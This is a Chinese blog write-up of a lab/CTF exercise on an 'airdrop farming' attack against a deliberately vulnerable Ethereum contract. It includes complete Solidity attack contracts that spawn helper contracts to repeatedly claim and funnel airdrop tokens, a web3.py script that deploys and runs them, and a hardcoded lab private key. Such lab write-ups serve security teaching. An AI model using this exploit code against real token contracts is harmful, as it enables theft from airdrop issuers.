某60区块链安全之薅羊毛攻击实战一学习记录

最新推荐文章于 2024-05-02 21:33:43 发布
最新推荐文章于 2024-05-02 21:33:43 发布
阅读量1.7k 收藏 29
点赞数 23
文章标签: 区块链 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/134704182
版权

区块链安全

文章目录

薅羊毛攻击实战一

实验目的

学会使用python3的web3模块
学会分析以太坊智能合约薅羊毛攻击漏洞
找到合约漏洞进行分析并形成利用

实验环境

Ubuntu18.04操作机

实验工具

python3

实验原理

薅羊毛攻击指使用多个不同的新账户来调用空投函数获得空投币并转账至攻击者账户以达到财富累计的一种攻击方式。这类攻击方式较为普通且常见,只要是有空投函数的合约都能够进行薅羊毛。

实验内容

合约中内置了空投函数和潜在的薅羊毛攻击问题,找到合约漏洞并形成利用,把合约中的flag变量设置为true即可
使用python3的web3模块远程利用漏洞并获取flag
实验地址为nc ip 10009

薅羊毛攻击实战一 实验步骤

获取合约地址和合约源代码
nc ip 10009连接到题目,输入1,获取部署合约的game account及token
在这里插入图片描述

打开http://ip,输入上述分配的game account,点击Request获取eth
在这里插入图片描述
在这里插入图片描述
ctrl+shift+d
退出

nc ip 10009连接到题目,输入2,获取部署合约的地址及new token
在这里插入图片描述

nc ip 10009连接到题目,输入4,获取合约源代码,或者在题目附件找到合约源代码
在这里插入图片描述

分析合约源代码漏洞
题目要求将合约中的flag变量设置为true
在这里插入图片描述

分析代码逻辑,需要满足balanceOf[msg.sender] >= 2000才能设置flag为true
题目中有空投函数,每次空投可以使 balance 增加 100,并且也有转账函数,可以将 balance 转给其他用户
那么我们可以使用薅羊毛的攻击方式,创建 20 个临时合约来调用空投函数,并转账给主合约来使得 balanceOf[msg.sender] >= 2000

EXP利用

编写攻击合约attack.sol,将下述ETH9地址替换成自己题目合约的地址,主要包括三个功能:middle_attack合约用于申领空投,并转账给主攻击合约attack;attack合约通过new函数不断申请创建middle_attack合约,直至满足balanceOf[attack] >= 2000;当balanceOf[attack] >= 2000时,调用attack合约的get_flag函数,在get_flag函数中调用题目合约的payforflag函数将flag设置为true

pragma solidity ^0.4.23;

contract attack{
    function attack_airdrop() public {
        for(uint i = 0; i < 20; i++){
            new middle_attack(address(this));
        }
    }

    function get_flag() public {
        ETH9 target = ETH9(0x05653f1dE1512EFC31eb6dd835947AF697fA7be0);
        target.payforflag();
    }
}

contract middle_attack{
    constructor(address addr) public {
        ETH9 target = ETH9(0x05653f1dE1512EFC31eb6dd835947AF697fA7be0);
        target.gift();
        target.transfer(addr,100);
    }
}

编写python3自动化脚本,将上述攻击合约部署,然后按照上述步骤分别执行即可

from web3 import Web3, HTTPProvider
from solcx import compile_source,set_solc_version_pragma
import time

w3 = Web3(Web3.HTTPProvider('http://192.168.2.102:8545'))

contract_address = "0x05653f1dE1512EFC31eb6dd835947AF697fA7be0"
private = "92b562f4dcb430f547401f31b5d1074e6791ec37786f449497c4f9563abef3fb"
public = "0x75e65F3C1BB334ab927168Bd49F5C44fbB4D480f"

def generate_tx(chainID, to, data, value):
    txn = {
        'chainId': chainID,
        'from': Web3.toChecksumAddress(public),
        'to': to,
        'gasPrice': w3.eth.gasPrice,
        'gas': 3000000,
        'nonce': w3.eth.getTransactionCount(Web3.toChecksumAddress(public)),
        'value': Web3.toWei(value, 'ether'),
        'data': data,
    }
    return txn

def sign_and_send(txn):
    signed_txn = w3.eth.account.signTransaction(txn, private)
    txn_hash = w3.eth.sendRawTransaction(signed_txn.rawTransaction).hex()
    txn_receipt = w3.eth.waitForTransactionReceipt(txn_hash)
    print("txn_hash=", txn_hash)
    return txn_receipt

set_solc_version_pragma('^0.4.23')
with open('./attack.sol', 'r') as f:
    SRC_TEXT = f.read()
compiled_sol = compile_source(SRC_TEXT)
CONT_IF = compiled_sol['<stdin>:attack']

# deploy attack.sol
txn = generate_tx(8888, '', CONT_IF['bin'], 0)
txn_receipt = sign_and_send(txn)
hack_address = txn_receipt['contractAddress']
print('hack_address =',hack_address)

# call attack_airdrop() in attack.sol
data = Web3.keccak(text='attack_airdrop()').hex()[:10]
txn = generate_tx(8888, Web3.toChecksumAddress(hack_address), data, 0)
txn_receipt = sign_and_send(txn)
if(txn_receipt['status']==1):
    print("call attack_airdrop() success")

time.sleep(5)

# call get_flag() in attack.sol
data = Web3.keccak(text='get_flag()').hex()[:10]
txn = generate_tx(8888, Web3.toChecksumAddress(hack_address), data, 0)
txn_receipt = sign_and_send(txn)
if(txn_receipt['status']==1):
    print("call get_flag() success")

执行exp
在这里插入图片描述

nc ip 10009连接到题目,输入3,输入之前的new token,获取flag
在这里插入图片描述

GuiltyFet
关注
  • 23
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
区块链中的薅羊毛,你被薅了吗
weixin_49510863的博客
07-21 2156
自从区块链被炒得火热之后,似乎什么东西都要跟区块链挂上钩,比如华为的区块链手机、京东的区块链防伪追溯平台等。区块链的研究发展也有几年了,相信最初做研发的人们也是想着后期赚钱的,就像我们想在使用的手机APP一样,没有一个会是完完全全的免费使用的,它总是会通过各种各样的方式让你付费,当然区块链也是如此,要不然它前期研发投入那么多的资金怎么收回呢,就是通过后期为人们提供服务以及其它的一些途径进行收回的。 事实上有很多人知道其中的大道理,但无奈的是他们不懂得其中的技术或英语。那么他们如何与拥有优势的人竞争呢.
区块链分类与架构模型-学习笔记
01-20
一、分类         1)第一种分类:根据区块链运行过程中是否需要中心节点或者权限优势节点授权,可将区块链划分为无许可区块链(Permissionless Blockchain)和许可区块链(Permissioned Blockchain).         (1)无许可区块链:是一种完全去中心化的分布式账本技术,运行节点自由加入和退出,无须通过中心节点注册、认证和授权。         (2)许可区块链:存在一个或多个节点具有较高权限,这些节点可以是可信第三方,也可能节点之间仍然互不信任、需要协商制定区块链维护规则和访问控制权限,只有经过相应功能授权的节点才可访问数据、参与系统维护。  
信息安全技术 区块链的技术安全框架
04-19
本文件提出了区块链技术安全框架,描述了框架的层次结构以及区块链各参与角色的安全视图。 本文件适用于指导基于区块链技术的信息系统进行安全风险防范,特别是联盟链系统,也适用于指导指导所有区块链参与者在区块链设计开发、研制、部署和运行的全过程中进行整体规划、安全框架设计、及安全性评估。
区块链安全合集(38份).zip
03-29
集合了区块链安全相关政策、标准及解答、发展与应用白皮书、企业级区块链安全白皮、行业应用场景及案例、区块链所引发的产业链重构、区块链安全能力测评与分析报告、区块链编程、区块链技术指南、区块链开发、区块链参考架构、区块链项目管理、区块链应用、区块链商业计划书等等38份资料
2022年区块链安全白皮书
10-24
区块链安全涉及到许多前沿技术、概念,如:加密算法、数字签名等。行业每年会发布大 量相关白皮书、报告,对区块链技术、加密货币以及应用生态,都有精彩的讨论,但SAFEIS注意到,目前缺少针对区块链安全本身的科普与年度总结。 为了让大众更全面地了解区块链安全的全球最新进展,并更好地保护自身财产安全,SAFEIS 决定撰写本白皮书,希望能对新手用户和资深从业者,都有所帮助。本白皮书旨在介绍区块链安全的基本概念和技术,探讨区块链安全面临的最新挑战,介绍常见解决方案,并展望 2023 年区块链行业的发展方向与可能面临的问题。
solidity Dapp 一个账户接受N份投放
The future is already here it's just not evenly distributed。
09-19 1808
自从有了空投,是不是觉得账户不够用了,总想多拿一些糖果,但是又不想每个账户都转一些eth,这样很麻烦,矿工费也不少。如果你有幸看到这里,那么恭喜你,你在空投的道路上,将会步入一个新的台阶,用智能合约薅羊毛。你会发现从来没有遇见这么秃的羊。 这个方法只适合一种情况的空投,就是你转0个token,就可以获得空投。这里需要事先说明一下,你要想薅羊毛,需要根据token的合约而定,千万不要生搬硬...
LCTF2018 ggbank 薅羊毛实战
Fly_鹏程万里
11-21 531
11.18号结束的LCTF2018中有一个很有趣的智能合约题目叫做ggbank,题目的原意是考察弱随机数问题,但在题目的设定上挺有意思的,加入了一个对地址的验证,导致弱随机的难度高了许多,反倒是薅羊毛更快乐了,下面就借这个题聊聊关于薅羊毛实战操作。 分析 源代码https://ropsten.etherscan.io/address/0x7caa18d765e5b4c3bf083113792...
@开发者,这个 GitHub 项目可以褥羊毛!
CSDN资讯
02-19 5690
作者|阿文责编 | 郭芮出品 | CSDN(ID:CSDNnews)给开发者送福利,免费送将近 10000 人民币?GitHub 有一个区块链项目 Handshake 正在面向Git...
如何使用python进行eth批量转账,薅羊毛必备!
xiangxueerfei的博客
05-08 1540
Web3.py是连接以太坊的python库,它常见于去中心化应用程序 (dapps) 中,用于帮助发送交易、与智能合约交互、读取块数据以及各种其他用例。它的API从web3.js中派生而来,如果你用过web3.js,你会对它的API很熟悉。一、初始化你的 Web3 实例,连接到对应的链RPC,比如eth,bsc,heco,okex等等。rpc节点大全二、以太坊转账等上链操作,对于以太坊来说都是一笔交易,发送交易关键参数如下。(1)、nonce– 这是账号的一个交易计数。(2)、to– 目标账户。
揭秘0撸资金盘:区块链噱头,拉人头模式,数亿元收割
weixin_44383880的博客
07-01 9373
0撸项目不变的是,利用高收益、高返佣,瞄准人性的贪婪。作者:石岩来源:DeepChain深链玩家们是越来越“精明”了。近几年,得益于不断加强的反传销力度,打着“投资入股”旗号的传销是越来...
区块链】深入剖析免费赚钱app的本质
九芒星的博客
01-21 6079
你对免费赚钱软件好奇吗?如果你有以下疑问,本篇文章带你一探究竟!刷视频能赚钱?看新闻能赚钱?走路也能赚钱?玩游戏也能赚钱?他们到底是怎么捞钱的呢?这些app的底层逻辑又是什么?真的是你在薅app的羊毛吗?它们靠什么赚钱?免费赚钱app真的是在做慈善吗?互联网挖矿是什么?虚拟货币又是什么?区块链又是怎样悄无声息的骗到你的?达芬奇的《蒙娜丽莎》创作完400年间无人问津,为何一夜间家喻户晓,上世纪初刚进入大众视野,身价就已高达34亿美元。真的是因为人们艺术鉴赏能力刚刚被挖掘,才看到它的艺术价值吗?
4月20日,杭州Sui Meetup活动回顾
Sui_Network的博客
05-01 1064
4 月 20 日在风景如画的杭州,「TinTin DESTINATION MOON」成功举办。此次活动深入探讨了 Sui 生态系统的演进及未来机遇,包括 Sui 上的资产管理协议 Mole、全链引擎 Obelisk Engine 以及 Generator 的开发范式等热点话题,行业专家提供了深刻见解和答案。
笃行致远,“易”往无前 | 易保全成立10周年啦
weixin_49292035的博客
04-28 405
10年间,我们聚焦四大区块链核心业务,在一次次技术创新与实践中,不断推进产品迭代升级,实现了与金融、物流运输、人力资源、电子政务、汽车、生产制造、医药医疗、图片摄影、律所等各行业的深度融合与应用。”为使命,坚信区块链的未来,夯实区块链底层技术,搭建“保全链”系统,首创“区块链+司法+应用”的模式,推出了四大区块链基础应用设施。10年后,易保全成为国内权威的电子数据存证保全机构,每一项成就背后都是“易”家人以步履铿锵之姿走过的每一步,当然也离不开广大用户、客户、伙伴的信赖与支持,才能让易保全行稳致远。
区块链 | IPFS:Merkle DAG(进阶版)
最新发布
狂放不羁霸的博客
05-02 1149
Merkle DAG
武汉星起航:挂牌上海股权中心,开启资本新篇章助力跨境电商飞跃
xqhang的博客
04-28 392
从长远来看,武汉星起航的挂牌上市还将对整个跨境电商行业产生积极的影响。同时,随着武汉星起航在资本市场上的不断壮大,其对于跨境电商行业的技术创新、模式创新等方面的投入也将不断增加,为整个行业的进步和发展注入新的动力。武汉星起航在跨境电商领域的专业能力和丰富经验将得到更多投资者的认可,进而吸引更多的合作伙伴和战略投资者,共同推动公司业务的快速发展。我们有理由相信,在未来的发展中,武汉星起航将继续发挥其在跨境电商领域的专业优势和创新精神,为更多的创业者和投资者提供优质服务,推动整个行业的持续健康发展。
区块链技术:DAPP开发
再熬夜头发就要掉光光咯
04-30 485
此外,区块链技术还将推动数字货币和智能合约的发展,为未来的商业交易和结算提供更加安全、便捷和高效的方式。面对挑战和机遇,我们需要加强技术研发和人才培养,推动监管政策的制定和实施,以实现DAPP的健康和可持续发展。我们相信,在不久的将来,DAPP将成为未来商业生态的关键一环,为人类社会带来更多的便利和价值。为了解决这个问题,需要加强国际合作,推动监管政策的制定和实施,确保DAPP的健康和可持续发展。通过区块链技术,可以实现物联网设备之间的安全、透明的数据交换,提高物联网应用的可靠性和安全性。
Web3与智能合约:科技革新下的新金融时代
weixin_44672358的博客
04-29 1251
Web3与智能合约的结合将为金融行业带来巨大的变革和创新,开启了一个全新的数字化金融时代。我们期待着智能合约技术的不断发展和应用,共同推动着金融行业向更加智能、高效和可信的方向迈进。
2024-04-29 区块链-项目-记录
技术之路
04-29 854
2024-04-29 区块链-项目-记录
区块链智能合约与dapp应用实战电子版
08-04
区块链智能合约是一种基于区块链技术的智能化合约,它通过编写智能合约代码,实现了自动化执行、验证和执行合约条件的功能。区块链智能合约具有去中心化、透明、安全等特点,可以用于各种领域的应用。 DApp(去中心化应用)是构建在区块链上的应用程序,与传统的中心化应用不同,DApp使用智能合约来管理和执行应用逻辑,数据存储在区块链上,确保信息的可靠性和安全性。 实战电子版指的是对区块链智能合约与DApp应用进行实际操作和开发的电子版本。通过实战电子版,用户可以学习如何编写智能合约代码,了解区块链技术的应用场景,以及如何开发DApp应用。 实战电子版可以提供一系列的案例和示例代码,提供操作指南和开发工具,帮助用户深入理解区块链智能合约与DApp应用的原理和使用方法。用户可以通过实践和模拟操作来学习,并将所学知识应用到实际的区块链项目中。 通过实战电子版,用户可以学习到智能合约的编写和部署、DApp应用的开发和测试、区块链节点的搭建和管理等相关知识。同时,实战电子版还可以提供实时更新和维护,以适应区块链技术的不断发展和更新。 总而言之,区块链智能合约与DApp应用实战电子版是一种通过实践和模拟操作来学习和探索区块链技术的电子学习资源,对于理解、应用和开发区块链相关项目具有重要意义。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值